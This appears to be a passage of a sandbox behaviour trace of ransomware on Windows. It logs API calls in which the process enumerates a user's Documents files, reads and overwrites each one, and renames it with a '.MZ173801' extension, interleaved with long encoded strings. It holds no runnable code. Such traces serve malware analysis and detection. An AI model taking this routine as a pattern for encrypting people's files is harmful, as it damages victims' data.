lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.021] GetCurrentThreadId () returned 0x1358 [0122.021] GetCurrentThreadId () returned 0x1358 [0122.021] GetCurrentThreadId () returned 0x1358 [0122.021] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\MRdmd02KMM5JtOIVQ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\mrdmd02kmm5jtoivq.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.021] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0122.021] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.022] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xa1b [0122.022] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.022] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xa1b, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xa1b, lpOverlapped=0x0) returned 1 [0122.022] CloseHandle (hObject=0x3d0) returned 1 [0122.023] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\MRdmd02KMM5JtOIVQ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\mrdmd02kmm5jtoivq.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.024] WriteFile (in: hFile=0x3d0, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0xa1b, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f6f0*=0xa1b, lpOverlapped=0x0) returned 1 [0122.025] CloseHandle (hObject=0x3d0) returned 1 [0122.026] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\MRdmd02KMM5JtOIVQ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\mrdmd02kmm5jtoivq.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\MRdmd02KMM5JtOIVQ.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\mrdmd02kmm5jtoivq.docx.mz173801")) returned 1 [0122.026] GetCurrentThreadId () returned 0x1358 [0122.026] GetCurrentThreadId () returned 0x1358 [0122.026] GetCurrentThreadId () returned 0x1358 [0122.026] GetCurrentThreadId () returned 0x1358 [0122.026] GetCurrentThreadId () returned 0x1358 [0122.026] GetCurrentThreadId () returned 0x1358 [0122.026] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89952490, ftCreationTime.dwHighDateTime=0x1d5ee43, ftLastAccessTime.dwLowDateTime=0x89a91900, ftLastAccessTime.dwHighDateTime=0x1d5ee07, ftLastWriteTime.dwLowDateTime=0x89a91900, ftLastWriteTime.dwHighDateTime=0x1d5ee07, nFileSizeHigh=0x0, nFileSizeLow=0x13912, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="pcZF9GerhzqY0.xls", cAlternateFileName="PCZF9G~1.XLS")) returned 1 [0122.026] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.026] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.026] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\pcZF9GerhzqY0.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\pczf9gerhzqy0.xls"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89952490, ftCreationTime.dwHighDateTime=0x1d5ee43, ftLastAccessTime.dwLowDateTime=0x89a91900, ftLastAccessTime.dwHighDateTime=0x1d5ee07, ftLastWriteTime.dwLowDateTime=0x89a91900, ftLastWriteTime.dwHighDateTime=0x1d5ee07, nFileSizeHigh=0x0, nFileSizeLow=0x13912)) returned 1 [0122.027] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.027] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.027] GetCurrentThreadId () returned 0x1358 [0122.027] GetCurrentThreadId () returned 0x1358 [0122.027] GetCurrentThreadId () returned 0x1358 [0122.028] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.028] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.028] GetCurrentThreadId () returned 0x1358 [0122.028] GetCurrentThreadId () returned 0x1358 [0122.028] GetCurrentThreadId () returned 0x1358 [0122.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\pcZF9GerhzqY0.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\pczf9gerhzqy0.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.028] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0122.028] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.028] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x13912 [0122.028] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.028] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x13912, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x13912, lpOverlapped=0x0) returned 1 [0122.030] CloseHandle (hObject=0x3d0) returned 1 [0122.031] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\pcZF9GerhzqY0.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\pczf9gerhzqy0.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.032] WriteFile (in: hFile=0x3d0, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x13912, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x13912, lpOverlapped=0x0) returned 1 [0122.034] CloseHandle (hObject=0x3d0) returned 1 [0122.036] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\pcZF9GerhzqY0.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\pczf9gerhzqy0.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\pcZF9GerhzqY0.xls.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\pczf9gerhzqy0.xls.mz173801")) returned 1 [0122.037] GetCurrentThreadId () returned 0x1358 [0122.037] GetCurrentThreadId () returned 0x1358 [0122.037] GetCurrentThreadId () returned 0x1358 [0122.037] GetCurrentThreadId () returned 0x1358 [0122.037] GetCurrentThreadId () returned 0x1358 [0122.037] GetCurrentThreadId () returned 0x1358 [0122.037] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38b96be0, ftCreationTime.dwHighDateTime=0x1d5e4bf, ftLastAccessTime.dwLowDateTime=0xcedf1100, ftLastAccessTime.dwHighDateTime=0x1d5e8f3, ftLastWriteTime.dwLowDateTime=0xcedf1100, ftLastWriteTime.dwHighDateTime=0x1d5e8f3, nFileSizeHigh=0x0, nFileSizeLow=0x16454, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="r_vOYVV008qvPgkFp.pps", cAlternateFileName="R_VOYV~1.PPS")) returned 1 [0122.037] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.037] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.037] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\r_vOYVV008qvPgkFp.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\r_voyvv008qvpgkfp.pps"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38b96be0, ftCreationTime.dwHighDateTime=0x1d5e4bf, ftLastAccessTime.dwLowDateTime=0xcedf1100, ftLastAccessTime.dwHighDateTime=0x1d5e8f3, ftLastWriteTime.dwLowDateTime=0xcedf1100, ftLastWriteTime.dwHighDateTime=0x1d5e8f3, nFileSizeHigh=0x0, nFileSizeLow=0x16454)) returned 1 [0122.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ